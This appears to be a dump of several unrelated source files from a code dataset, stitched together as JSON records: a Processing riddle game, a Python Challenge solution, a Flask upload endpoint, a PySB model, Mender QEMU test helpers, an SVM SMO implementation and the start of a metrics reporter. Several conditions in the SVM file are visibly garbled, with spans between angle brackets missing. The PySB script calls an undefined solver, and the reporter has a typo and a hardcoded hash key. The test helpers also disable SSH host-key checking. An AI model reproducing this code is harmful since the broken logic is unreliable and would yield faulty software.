loadImage(\"bedside.png\")\n img_winner = loadImage(\"winner.png\")\n\n\ndef draw():\n global screen\n global x, y\n noFill()\n #character\n rect(x, y, 80, 80)\n #main menu\n if screen == 0:\n background(255, 165, 0)\n fill(255)\n main_menu()\n #living room\n if screen == 1:\n background(0)\n character_movement(x, y, room_obstacles)\n room_graphics()\n room_screenchange()\n display_location(x, y)\n character_animation(x, y)\n if keyPressed and key == \"e\":\n screen = 6\n #outside\n if screen == 2:\n character_movement(x, y2, outdoor_obstacles)\n outdoor_graphics()\n outdoor_screenchange()\n display_location(x, y2)\n character_animation(x, y2)\n #bedroom\n if screen == 3:\n background(0)\n character_movement(x, y, upstairs_obstacles)\n bedroom_graphics()\n display_location(x, y)\n bedroom_screenchange()\n character_animation(x, y)\n #how to play\n if screen == 5:\n background(255,165,0)\n textSize(30)\n text(\"Check the funiture for pieces of a riddle,\", 30, 50)\n text(\"Once you've looked at all the pieces find out what the riddle is,\", 30, 90)\n text(\"Choose the correct answer at the chest to win\", 30, 130)\n textSize(30)\n text(\"Back\", 1000, 600)\n if (mouseX >= 1000 and mouseX <= 1050 and mouseY >= 590 and mouseY <= 615 \n and mousePressed):\n screen = 0\n #opened chest \n if screen == 6:\n background(75, 0, 130)\n textSize(40)\n text(\"Choose the correct answer or lose!\", 200, 100)\n text(\"what is the answer to the riddle??\", 205, 150)\n textSize(30)\n text(\"a shadow\", 100, 250)\n if (mouseX >= 50 and mouseX <= 250 and mouseY >= 200 and mouseY <= 400\n and mousePressed):\n screen = 7\n \n text(\"photography film\", 700, 250)\n if (mouseX >= 650 and mouseX <= 850 and mouseY >= 200 and mouseY <= 400\n and mousePressed):\n screen = 10\n \n text(\"a plant\", 100, 650)\n if (mouseX >= 50 and mouseX <= 250 and mouseY >= 600 and mouseY <= 800\n and mousePressed):\n screen = 10\n \n text(\"a moth\", 700, 650)\n if (mouseX >= 650 and mouseX <= 850 and mouseY >= 600 and mouseY <= 800\n and mousePressed):\n screen = 10\n #won game\n if screen == 7:\n import time\n global timeElapsed\n timeElapsed = timeElapsed or millis()\n background(75, 0, 130)\n image(img_winner, 400, 400)\n textSize(50)\n fill(255, 215, 0)\n text(\"WINNER, WINNER!\", 375, 200)\n fill(255)\n if millis() > timeElapsed + 4000:\n screen = 0\n #pre-game\n if screen == 8:\n import time\n global timeElapsed\n timeElapsed = timeElapsed or millis()\n \n background(0)\n \n fill(255)\n textSize(20)\n text(\"What's your name?\", 300, 400)\n \n if millis() > timeElapsed + 2500:\n fill(255)\n textSize(20)\n text(\"Just kidding. We don't care.\", 300, 500)\n \n if millis() > timeElapsed + 5000:\n fill(255)\n textSize(20)\n text(\"Your new name is Ted Bundy.\", 300, 600)\n \n if millis() > timeElapsed + 8000:\n timeElapsed = None\n screen = 1\n #lost game\n if screen == 10:\n import time\n global timeElapsed\n timeElapsed = timeElapsed or millis() \n background(186, 29, 29)\n fill(0)\n textSize(50)\n text(\"You Lost >:)\", 450, 400)\n text(\"Try again\", 475, 550)\n fill(255)\n if millis() > timeElapsed + 3000:\n screen = 1\n #piece of riddle \n if screen == 11:\n background(0, 0, 205)\n textSize(50)\n text(\"me. What\", 500, 550)\n text(\"back\", 50, 50)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 1\n #piece of riddle \n if screen == 12:\n background(150, 0, 0)\n textSize(50)\n text(\"shines on\", 500, 550)\n text(\"back\", 50, 50)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 1\n #piece of riddle \n if screen == 13:\n background(0, 190, 0)\n textSize(50)\n text(\"but I\", 500, 550)\n text(\"back\", 50, 50)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 1\n #piece of riddle \n if screen == 14:\n background(0)\n textSize(50)\n text(\"where there\", 500, 550)\n text(\"back\", 50, 50)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 1\n #piece of riddle \n if screen == 15:\n background(178,34,34)\n textSize(50)\n text(\"die if\", 500, 550)\n text(\"back\", 50, 50)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 3\n #piece of riddle \n if screen == 16:\n background(221, 160, 221)\n textSize(50)\n text(\"only live\", 500, 550)\n text(\"back\", 50, 50)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 3\n #piece of riddle \n if screen == 17:\n background(135, 206, 250)\n textSize(50)\n text(\"is light\", 500, 550)\n text(\"back\", 50, 50)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 2\n #piece of riddle \n if screen == 18:\n background(212, 175, 55)\n textSize(50)\n text(\"the light\", 500, 550)\n text(\"back\", 50, 50)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 2\n #piece of riddle \n if screen == 19:\n background(230,230,250)\n textSize(50)\n fill(0)\n text(\"I can\", 500, 550)\n text(\"back\", 50, 50)\n fill(255)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 2\n #piece of riddle \n if screen == 20:\n background(218, 165, 32)\n textSize(50)\n fill(0)\n text(\"am I?\", 500, 550)\n text(\"back\", 50, 50)\n fill(255)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 2\n \ndef room_graphics():\n global obstacles\n global x, y\n image(img_floor, 50, 50)\n image(img_floor, 50, 145)\n image(img_floor, 50, 240)\n image(img_floor, 50, 335)\n image(img_floor, 50, 430)\n image(img_floor, 50, 525)\n image(img_floor, 50, 620)\n image(img_door, 510, 40)\n image(img_croppedfloor, 780, 50)\n image(img_floor, 355, 145)\n image(img_croppedfloor, 780, 240)\n image(img_floor, 355, 335)\n image(img_croppedfloor, 780, 430)\n image(img_floor, 355, 525)\n image(img_croppedfloor, 780, 620)\n image(img_floor, 355, 655)\n image(img_floor, 50, 655)\n image(img_carpet, 200, 100)\n image(img_couch, 50, 50)\n image(img_chest, 900, 50)\n image(img_desk, 0, 525)\n image(img_stairs, 945, 540)\n image(img_stairs, 945, 640)\n image(img_table, 110, 320)\n fill(0)\n rect(940, 540, 10, 230)\n noFill()\n noStroke()\n for furniture in room_obstacles:\n rect(*furniture)\n noFill()\n #character\n rect(x, y, 60, 0)\n \ndef room_screenchange():\n global x, y\n global screen\n if (x >= 505 and x <= 670 and y >= 45 and y <= 65):\n textSize(15)\n text(\"press i to go outside\", 520, 150)\n if keyPressed:\n if (key == \"i\"):\n screen = 2\n #stairs\n if (x >= 800 and x <= 900 and y >= 600 and y <= 750):\n textSize(15)\n text(\"press x to inspect the stairs\", 760, 540)\n if keyPressed:\n if (key == \"x\"):\n screen = 11\n #chest\n if (x >= 900 and x <= 1050 and y >= 50 and y <= 280):\n textSize(15)\n text(\"press o to open chest\", 700, 250)\n if (keyPressed):\n if (key == 'o'):\n screen = 6\n #couch\n if (x >= 100 and x <= 350 and y >= 50 and y <= 280):\n textSize(15)\n text(\"press x to inspect the couch\", 200, 250)\n if (keyPressed):\n if (key == 'x'):\n screen = 12\n #goldfish\n if (x >= 100 and x <= 350 and y >= 500 and y <= 1050):\n textSize(15)\n text(\"press x to inspect the goldfish\", 300, 550)\n if (keyPressed):\n if (key == 'x'):\n screen = 13\n \n #table \n if (x >= 45 and x <= 395 and y >= 305 and y <= 420):\n textSize(15)\n text(\"press x to inspect the table\", 400, 340)\n if (keyPressed):\n if (key == 'x'):\n screen = 14 \n #upstairs\n if (x >= 950 and x <= 1100 and y >= 620 and y <= 750):\n textSize(15)\n text(\"press i to go upstairs\", 770, 600)\n if keyPressed:\n if (key == \"i\"):\n screen = 3 \n \ndef display_location(x, y):\n textSize(15)\n text(str(x), 10, 20)\n text(str(y), 10, 40)\n \ndef character_movement(playerx, playery, obstacles_ar):\n global x, y, y2\n\n if keyPressed and key == CODED:\n if keyCode == UP and y >= 50:\n y -= 5\n if point_collide(playerx, playery, obstacles_ar) == True:\n y += 5\n if (keyCode == DOWN and y <= 650):\n y += 5\n if point_collide(playerx, playery, obstacles_ar) == True:\n y -= 5\n if screen == 2 and keyPressed and key == CODED:\n if keyCode == UP and y2 >= 50:\n y2 -= 5\n if point_collide(playerx, playery, outdoor_obstacles) == True:\n y2 += 5\n if (keyCode == DOWN and y2 <= 650):\n y2 += 5\n if point_collide(playerx, playery, outdoor_obstacles) == True:\n y2 -= 5\n if (keyCode == LEFT and x >= 50):\n x -= 5\n if point_collide(playerx, playery, obstacles_ar) == True:\n x += 5\n if (keyCode == RIGHT and x <= 1090):\n x += 5\n if point_collide(playerx, playery, obstacles_ar) == True:\n x -= 5\n \ndef character_animation(x, y):\n if keyCode == LEFT:\n image(img_ted_left, x, y)\n elif keyCode == DOWN:\n image(img_ted_down, x, y)\n elif keyCode == UP:\n image(img_ted_up, x, y)\n elif keyCode == RIGHT:\n image(img_ted_right, x, y)\n else:\n image(img_ted_down, x, y)\n \ndef point_collide(playerx, playery, obstacles_ar):\n global x, y, y2\n \n if screen == 2:\n y = y2\n \n player_x1 = x\n player_x2 = x + 60\n player_y1 = y\n player_y2 = y + 60\n\n for furniture in obstacles_ar:\n\n x_coll = False\n y_coll = False\n \n obstical_x1 = furniture[0]\n obstical_y1 = furniture[1]\n obstical_x2 = furniture[0] + furniture[2]\n obstical_y2 = furniture[1] + furniture[3]\n \n if (player_x2 >= obstical_x1) and (player_x1 <= obstical_x2):\n x_coll = True\n \n if (player_y2 >= obstical_y1) and (player_y1 <= obstical_y2):\n y_coll = True\n \n if x_coll is True and y_coll is True:\n return True\n \n return False\n \n\ndef main_menu():\n global screen\n textSize(70)\n text(\"Welcome To Yikes\", 320, 300)\n textSize(50)\n text(\"Play\", 550, 500)\n text(\"How to Play\", 450, 600)\n if (mouseX >= 550 and mouseX <= 650 and mouseY >= 475 and\n mouseY <= 515 and mousePressed):\n screen = 8\n if (mouseX >= 500 and mouseX <= 775 and mouseY >= 575 and mouseY <=615\n and mousePressed):\n screen = 5\n \ndef outdoor_screenchange():\n global screen\n global y\n # tree \n if (x >= 105 and x <= 430 and y2 >= 45 and y2 <= 375):\n textSize(15)\n text(\"press x to inspect\", 430, 205)\n text(\"the tree\", 430, 225)\n if (keyPressed):\n if (key == 'x'):\n screen = 17\n #tree on right \n if (x >= 730 and x <= 1060 and y2 >= 55 and y2 <= 385):\n textSize(15)\n text(\"press x to inspect\", 625, 190)\n text(\"the tree\", 660, 210)\n if (keyPressed):\n if (key == 'x'):\n screen = 18\n #berry farm\n if (x >= 165 and x <= 430 and y2 >= 410 and y2 <= 645):\n textSize(15)\n text(\"press x to inspect\", 255, 450)\n text(\"the berry farm\", 255, 470)\n if (keyPressed):\n if (key == 'x'):\n screen = 19\n #picnic table \n if (x >= 720 and x <= 975 and y2 >= 445 and y2 <= 645):\n textSize(15)\n text(\"press x to inspect picnic table\", 790, 650)\n if (keyPressed):\n if (key == 'x'):\n screen = 20\n #going inside\n if (x >= 505 and x <= 685 and y2 >= 620 and y2 <= 700):\n textSize(15)\n text(\"press o to go inside\", 510, 675)\n if (keyPressed):\n if (key == 'o'):\n screen = 1\n if screen == 1:\n y = 100\n\ndef outdoor_graphics():\n background(135,206,250)\n rect(50, 50, 1100, 700)\n image(img_grass, 50, 50)\n image(img_grass, 519, 50)\n image(img_grass, 50, 355)\n image(img_grass, 519, 355)\n image(img_grassCropped, 50, 450)\n image(img_grassCropped, 519, 450)\n image(img_grassCropped2, 989, 50)\n image(img_grassCropped2, 989, 350)\n image(img_grassCropped3, 989, 655)\n image(img_door, 510, 735)\n image(img_tree, 170, 110)\n image(img_tree, 800, 120)\n image(img_berry, 230, 475)\n image(img_picnic, 785, 510)\n\ndef bedroom_screenchange():\n global screen\n if (x >= 950 and x <= 1100 and y >= 620 and y <= 750):\n textSize(15)\n text(\"press r to go downstairs\", 770, 600)\n if (keyPressed):\n if (key == \"r\"):\n screen = 1 \n # book shelf \n if (x >= 235 and x <= 815 and y >= 45 and y <= 205):\n textSize(15)\n fill(255)\n text(\"press x to inspect the book shelf\", 500, 200)\n if (keyPressed):\n if (key == 'x'):\n screen = 15\n # bed \n if (x >= 45 and x <= 345 and y >= 220 and y <= 490):\n textSize(15)\n text(\"press x to inspect the bed\", 345, 390)\n if (keyPressed):\n if (key == 'x'):\n screen = 16\n \ndef bedroom_graphics():\n image(img_floor, 50, 50)\n image(img_floor, 50, 145)\n image(img_floor, 50, 240)\n image(img_floor, 50, 335)\n image(img_floor, 50, 430)\n image(img_floor, 50, 525)\n image(img_floor, 50, 620)\n image(img_croppedfloor, 780, 50)\n image(img_floor, 355, 145)\n image(img_croppedfloor, 780, 240)\n image(img_floor, 355, 335)\n image(img_croppedfloor, 780, 430)\n image(img_floor, 355, 525)\n image(img_croppedfloor, 780, 620)\n image(img_floor, 355, 655)\n image(img_floor, 50, 655)\n image(img_carpet, 200, 100)\n image(img_bed, 45, 285)\n image(img_bookshelf, 300, 50)\n image(img_stairs, 945, 640)\n image(img_bedside, 65, 615)\n image(img_flowerpot, 80, 70)\n \ndef test_cases():\n assert y >= 50, \"Character out of range\"\n assert y <= 650, \"Character out of range\"\n assert x >= 50, \"Character out of range\"\n assert x <= 1090, \"Character out of range\"\n assert screen < 21, \"No such screen, check buttons for possible misnumbering.\"\n assert screen >= 0, \"No such screen, check buttons for possible misnumbering.\"\n\n#test_cases()\n","sub_path":"game.pyde","file_name":"game.pyde","file_ext":"pyde","file_size_in_byte":18084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"461237065","text":"from PIL import Image\n\n\nlast = 608\nox = Image.open('oxygen.png')\ny = 45\nfor x in range(0, last, 7):\n print(chr(ox.getpixel((x, y))[0]), end='')\nprint()\nnext_level = [105, 110, 116, 101, 103, 114, 105, 116, 121]\nfor i in next_level:\n print(chr(i), end='')\n","sub_path":"level7.py","file_name":"level7.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"203865235","text":"import io\nimport time\nfrom logging import getLogger\n\nfrom flask import Blueprint, redirect, render_template, request\n\nfrom app.dbModels import CSVtoDB, commit, stop\n\ncase1 = Blueprint('ex1', __name__, url_prefix='/ex1')\n\nLOG = getLogger(__name__)\n\n@case1.route('/')\ndef index():\n return render_template(\"uploadCSV.html\", case = 1)\n\n@case1.route('/upload', methods = ['POST'])\ndef upload():\n \"\"\"\n API Endpoint to upload the CSV file. It provides a form in which the file to the uploaded can be \n selected and added to the respective database. \n \"\"\"\n try:\n csvFile = request.files.get('data', None)\n fileName = csvFile.filename\n except:\n LOG.error(\"File Not Found!\")\n return redirect(\"/ex1\")\n \n try:\n CSVtoDB(1, fileName)\n except Exception as e:\n LOG.error(e)\n LOG.error(\"Invalid operation!\")\n return redirect('/ex1')\n\n return render_template(\"uploadComplete.html\", case = 1)\n\n@case1.route('/stopUpload', methods=['GET'])\ndef stopUpload():\n \"\"\"\n API Endpoint to stop the upload process. If the stop request is sent before the upload process is complete, the changes made will be \n rolled back and will not be commited to the database. \n \"\"\"\n \n stop()\n return render_template(\"uploadStopped.html\", case = 1)\n","sub_path":"app/exampleCase1.py","file_name":"exampleCase1.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"54815516","text":"from __future__ import print_function\n# import the pysb module and all its methods and functions\nfrom pysb import *\nfrom pysb.integrate import Solver, odesolve\nimport pylab as pl\n\n#units are in mM\n\n#instantiate the model\nModel()\n\n#instantiate species\nMonomer('Glucose')\nMonomer('G6P')\nMonomer('ATP')\nMonomer('ADP')\n\n#instantiate parameters\nParameter('Km_Glucose', 0.377)\nParameter('Km_ATP', 1.84)\nParameter('Vmax', 70.75)\n\n#intantiate rules\n#Rule('Phosphorylation', None >> Glucose(), Km_Glucose)\nRule('Phosphorylation', Glucose >> G6P , Km_Glucose)\nRule('Adenosine_conversion', ATP >> ADP , Km_ATP)\n\n#Inital conditions\nParameter('Glucose_0', 1)\nParameter('ATP_0', 1)\nInitial(Glucose, Glucose_0)\nInitial(ATP, ATP_0)\n\n#instanciate Observables\n\nObservable('obsGlucose', Glucose)\nObservable('obsG6P', G6P)\nObservable('obsATP', ATP)\nObservable('obsADP', ADP)\n\n\n#run simulation\nt = pl.linspace(0, 2000)\n\n\n#solver = Solver(model, t)\n#solver.run()\n\nprint(solver.y[:, 1])","sub_path":"Modelling.py","file_name":"Modelling.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"282638988","text":"#!/usr/bin/python\n# Copyright 2017 Northern.tech AS\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport time\nimport logging\n\nfrom platform import python_version\nif python_version().startswith('2'):\n from fabric.contrib.files import *\n from fabric.api import *\nelse:\n # User should re-implement: put, run\n pass\n\n# This is used to remember which docker-compose setup we're currently running.\n# This is for optimization purposes to avoid respawning the docker-compose\n# environment if we don't have to.\nSETUP_TYPE = None\n\nHAVE_TOKEN_TIMEOUT = 60 * 5\nMENDER_STORE = '/data/mender/mender-store'\n\n\ndef put(file, local_path=\".\", remote_path=\".\"):\n (scp, host, port) = scp_prep_args()\n\n local(\"%s %s %s/%s %s@%s:%s\" %\n (scp, port, local_path, file, env.user, host, remote_path))\n\n\ndef ssh_prep_args():\n return ssh_prep_args_impl(\"ssh\")\n\n\ndef scp_prep_args():\n return ssh_prep_args_impl(\"scp\")\n\n\ndef ssh_prep_args_impl(tool):\n if not env.host_string:\n raise Exception(\"get()/put() called outside of execute()\")\n\n cmd = (\"%s -C -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\" %\n tool)\n\n host_parts = env.host_string.split(\":\")\n host = \"\"\n port = \"\"\n port_flag = \"-p\"\n if tool == \"scp\":\n port_flag = \"-P\"\n if len(host_parts) == 2:\n host = host_parts[0]\n port = \"%s%s\" % (port_flag, host_parts[1])\n elif len(host_parts) == 1:\n host = host_parts[0]\n port = \"\"\n else:\n raise Exception(\"Malformed host string\")\n\n return (cmd, host, port)\n\n\ndef run(cmd, *args, **kw):\n if kw.get('wait') is not None:\n wait = kw['wait']\n del kw['wait']\n else:\n wait = 60*60\n\n output = \"\"\n start_time = time.time()\n sleeptime = 1\n # Use shorter timeout to get a faster cycle. Not recommended though, since\n # in a heavily loaded environment, QEMU might be quite slow to use the\n # connection.\n with settings(timeout=60, abort_exception=Exception):\n while True:\n try:\n import fabric.api\n output = fabric.api.run(cmd, *args, **kw)\n break\n except Exception as e:\n if time.time() >= start_time + wait:\n raise Exception(\"Could not connect to device\")\n time.sleep(sleeptime)\n # Back off exponentially to save SSH handshakes in QEMU, which\n # are quite expensive.\n sleeptime *= 2\n continue\n finally:\n # Taken from disconnect_all() in Fabric.\n from fabric.state import connections\n if connections.get(env.host_string) is not None:\n connections[env.host_string].close()\n del connections[env.host_string]\n return output\n\n# For now just alias sudo() to run(), since we always run as root. This may need\n# to be changed later.\ndef sudo(*args, **kw):\n run(*args, **kw)\n\n\ndef have_token():\n \"\"\" Make sure the MENDER_STORE file exists after sometime, else fail test \"\"\"\n\n sleepsec = 0\n while sleepsec < HAVE_TOKEN_TIMEOUT:\n try:\n run('strings {} | grep authtoken'.format(MENDER_STORE))\n return\n except Exception:\n sleepsec += 5\n time.sleep(5)\n logging.info(\"waiting for mender-store file, sleepsec: %d\" % sleepsec)\n\n assert sleepsec <= HAVE_TOKEN_TIMEOUT, \"timeout for mender-store file exceeded\"\n","sub_path":"tests/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":4027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"71146024","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport time\nimport random\n\ndef loadDataset(fileName):\n '''\n 说明:读入数据;并转化为np.array\n\n Arguments:\n fileName - 数据文件名\n\n Returns:\n dataMat - 数据集和:X\n labelMat - 数据集合:Y\n '''\n dataMat = []\n labelMat = []\n fr = open(fileName)\n for line in fr.readlines():\n lineArr = line.strip().split('\\t')\n dataMat.append([float(lineArr[0]), float(lineArr[1])])\n labelMat.append(float(lineArr[2]))\n\n dataArr = np.array(dataMat)\n m = np.shape(labelMat)\n labelArr = np.array(labelMat)\n labelArr = labelArr.reshape((m[0],1))\n\n return dataArr, labelArr\n\ndef showDataSet(dataMat, labelMat):\n '''\n Declaration:\n 画出正负样本图形\n\n :param dataMat: 样本X\n :param labelMat: 样本Y\n :return: 无\n '''\n data_plus = []\n data_minus = []\n for i in range(len(dataMat)):\n if labelMat[i] > 0:\n data_plus.append(dataMat[i])\n else:\n data_minus.append(dataMat[i])\n data_plus_np = np.array(data_plus)\n data_minus_np = np.array(data_minus)\n plt.scatter(np.transpose(data_plus_np)[0], np.transpose(data_plus_np)[1])\n plt.scatter(np.transpose(data_minus_np)[0], np.transpose(data_minus_np)[1])\n plt.show()\n\ndef clipAlpha(alpha, H, L):\n '''\n 修剪alpha的数值\n :param alpha: 输入alpha\n :param H: 上限\n :param L: 下限\n :return: 修剪后的 alpha_clipped\n '''\n if alpha>H :\n alpha = H\n if alpha 1e-8)\n _,num = np.shape(index_set)\n w = get_w(alphas, dataArr, labelArr)\n\n b_sum = 0\n for i in range(num):\n index = index_set[0][i]\n b_sum += labelArr[index][0] - np.dot(w, dataArr[index].T)\n b = b_sum/num\n return b\n\ndef showClassifer(dataMat, classLabels, w, b):\n \"\"\"\n 分类结果可视化\n Parameters:\n dataMat - 数据矩阵\n w - 直线法向量\n b - 直线解决\n Returns:\n 无\n \"\"\"\n #绘制样本点\n data_plus = [] #正样本\n data_minus = [] #负样本\n for i in range(len(dataMat)):\n if classLabels[i] > 0:\n data_plus.append(dataMat[i])\n else:\n data_minus.append(dataMat[i])\n data_plus_np = np.array(data_plus) #转换为numpy矩阵\n data_minus_np = np.array(data_minus) #转换为numpy矩阵\n plt.scatter(np.transpose(data_plus_np)[0], np.transpose(data_plus_np)[1], s=30, alpha=0.7) #正样本散点图\n plt.scatter(np.transpose(data_minus_np)[0], np.transpose(data_minus_np)[1], s=30, alpha=0.7) #负样本散点图\n #绘制直线\n x1 = max(dataMat[:, 0])\n x2 = min(dataMat[:, 0])\n a1, a2 = w[0][0], w[0][1]\n b = float(b)\n\n y1, y2 = (-b- a1*x1)/a2, (-b - a1*x2)/a2\n plt.plot([x1, x2], [y1, y2])\n #找出支持向量点\n for i, alpha in enumerate(alphas):\n if abs(alpha) > 1e-8:\n x, y = dataMat[i]\n plt.scatter([x], [y], s=150, c='none', alpha=0.7, linewidth=1.5, edgecolor='red')\n plt.show()\n\n'''\ndef showClassifer(dataMat, w, b):\n \"\"\"\n 分类结果可视化\n Parameters:\n dataMat - 数据矩阵\n w - 直线法向量\n b - 直线解决\n Returns:\n 无\n \"\"\"\n #绘制样本点\n data_plus = [] #正样本\n data_minus = [] #负样本\n for i in range(len(dataMat)):\n predict = np.dot(w, dataMat[i].T) + b\n if predict > 0:\n data_plus.append(dataMat[i])\n else:\n data_minus.append(dataMat[i])\n data_plus_np = np.array(data_plus) #转换为numpy矩阵\n data_minus_np = np.array(data_minus) #转换为numpy矩阵\n plt.scatter(np.transpose(data_plus_np)[0], np.transpose(data_plus_np)[1], s=30, alpha=0.7) #正样本散点图\n plt.scatter(np.transpose(data_minus_np)[0], np.transpose(data_minus_np)[1], s=30, alpha=0.7) #负样本散点图\n #绘制直线\n x1 = max(dataMat[:, 0])\n x2 = min(dataMat[:, 0])\n a1, a2 = w[0][0], w[0][1]\n b = float(b)\n\n y1, y2 = (-b- a1*x1)/a2, (-b - a1*x2)/a2\n plt.plot([x1, x2], [y1, y2])\n #找出支持向量点\n for i, alpha in enumerate(alphas):\n if abs(alpha) > 1e-8:\n x, y = dataMat[i]\n plt.scatter([x], [y], s=150, c='none', alpha=0.7, linewidth=1.5, edgecolor='red')\n plt.show()\n'''\n\ndef smoSimple(dataArr, labelArr, C, toler, maxIter):\n '''\n 简化版的smo算法,分割超平面wx + b = 0, 求该超平面的w b\n :param dataArr: 训练样本X\n :param labelArr: 训练样本标签Y\n :param C: 为一个给定常数,通过调节不同参数,获得不同结果\n :param toler: 松弛变量toler>=0\n :param maxIter: 最大迭代次数\n :return:\n '''\n m, _ = np.shape(dataArr)\n b = 0\n alphas = np.zeros((m,1))\n\n iter = 0\n iter_done = 0\n while (iter C)\n bool2 = 1 - yi*fxi > toler\n bool3 = abs(alphas[i]*(1 - yi*fxi - toler)) > 1e-8\n if bool1 or bool2 or bool3:\n j = selectJ(i, m)\n yj = labelArr[j,0]\n fxj = fx(dataArr, labelArr, j, alphas, b)\n Ej = fxj - yj\n\n alphaI_old = alphas[i,0]\n alphaJ_old = alphas[j,0]\n\n if abs(yi - yj)< 1e-8:\n L = max(0.0, alphaI_old + alphaJ_old -C)\n H = min(C, alphaI_old + alphaJ_old)\n else:\n L = max(0.0, alphaJ_old - alphaI_old)\n H = min(C, C + alphaJ_old - alphaI_old)\n\n xi = dataArr[i]\n xj = dataArr[j]\n\n eta = np.dot(xi, xi.T) + np.dot(xj, xj.T) - 2*np.dot(xi, xj.T)\n if abs(eta)<1e-8: continue #eta == 0\n\n alphaJ_new_temp = alphaJ_old + yj*(Ei - Ej)/eta\n alphaJ_new = clipAlpha(alphaJ_new_temp, H, L)\n\n alphaI_new = alphaI_old + yi*yj*(alphaJ_old - alphaJ_new)\n\n alphas[i] = alphaI_new\n alphas[j] = alphaJ_new\n\n #若alpha对,更新较小,则不计更新次数alphaPairsChange\n if (abs(alphaI_new - alphaI_old) < 1e-10) and \\\n (abs(alphaJ_new - alphaJ_old) < 1e-10):\n continue\n\n b1 = b - Ei - yi*np.dot(xi, xi.T)*(alphaI_new - alphaI_old) - \\\n yj*np.dot(xi, xj.T)*(alphaJ_new - alphaJ_old)\n b2 = b - Ej - yi*np.dot(xi, xj.T)*(alphaI_new - alphaI_old) - \\\n yj*np.dot(xj, xj.T)*(alphaJ_new - alphaJ_old)\n if (alphaI_new>0) and (alphaI_new0) and (alphaJ_new= 20 :\n print('last_iter:', iter)\n break\n\n if iter >= maxIter: print('last_iter', iter)\n w = get_w(alphas, dataArr, labelArr)\n b = get_b(alphas, dataArr, labelArr)\n\n return alphas, w, b\n\n\n\nif __name__ == '__main__':\n time_start = time.time()\n dataArr,labelArr = loadDataset('SVM_InputData.txt')\n alphas, w, b = smoSimple(dataArr, labelArr, 0.6, 1e-3, 800)\n print('w: ', w)\n print('b: ', b)\n time_end = time.time()\n print('time: ', time_end - time_start, 's')\n #showDataSet(dataArr, labelArr)\n #showClassifer(dataArr, w, b)\n showClassifer(dataArr, labelArr, w, b)\n","sub_path":"SVM/SVM_by_SMO_v1.py","file_name":"SVM_by_SMO_v1.py","file_ext":"py","file_size_in_byte":9371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"582294889","text":"# -*- coding: utf-8 -*-\nimport Queue\nimport hashlib\nimport json\nimport logging\nimport os\nimport socket\nimport sys\nimport threading\nimport time\n\nimport requests\n\n# float number in 2.6 has a bug.\nif sys.version_info[:2] == (2, 6):\n json.encoder.FLOAT_REPR = str\n\nLOGGER = logging.getLogger(__name__)\n\nTHREAD_EXIT = 0\nTHREAD_TASK = 1\nTHREAD_TIMEOUT = 2\nTIMEOUT = 1.0 # 1 second\nMAX_METRICS_PER_REQUEST = 1000 # 1000 metric\n\nCODE_MAP = {\n 200: 'Done',\n 300: 'Wrong Key',\n 301: 'Wrong ProtocolVersion',\n 302: 'Wrong AppVersion',\n 303: 'Wrong Business',\n 304: 'Wrong TimeStamp',\n 305: 'Wrong Signature',\n 306: 'Wrong Task',\n 307: 'Wrong ContentType',\n 501: 'DataBase Error',\n 601: 'Data Length Error',\n 602: 'Decryption Error',\n 603: 'Decompression Error',\n 604: 'Unrecognizable Body',\n 999: 'Unknown Error'\n}\n\n\ndef SendComponents(context, components, metrics):\n if not metrics:\n LOGGER.warning('No metrics to send this interval')\n return\n\n LOGGER.info('Sending %i metrics to RichAPM', metrics)\n context.components = components\n\n try:\n response = requests.post(context.endpoint,\n headers=context.header, data=context.body,\n proxies=context.ptoxies, timeout=context.timeout,\n verify=context.verify)\n except requests.Timeout as error:\n LOGGER.error('Timeout reporting stats, check endpoint(%s)',\n context.endpoint)\n return False\n except requests.RequestException as error:\n LOGGER.error('Error reporting stats, check endpoint(%s):%s',\n context.endpoint,\n unicode(error))\n return False\n\n try:\n res_json = response.json()\n result = int(res_json['result'])\n except (ValueError, KeyError) as error:\n LOGGER.error('Error response body, check endpoint(%s):%r',\n context.endpoint,\n response.content.strip())\n return False\n\n if result in CODE_MAP:\n res_msg = CODE_MAP[result]\n else:\n res_msg = response.content.strip()\n\n LOGGER.info('Report to RichAPM,Response(%s): %r(%d)',\n response.status_code, res_msg, result)\n\n\nclass Context(object):\n HASHKEY = 'uywP%(cnsjdf1'\n PROXIES = None\n TIMEOUT = 10\n 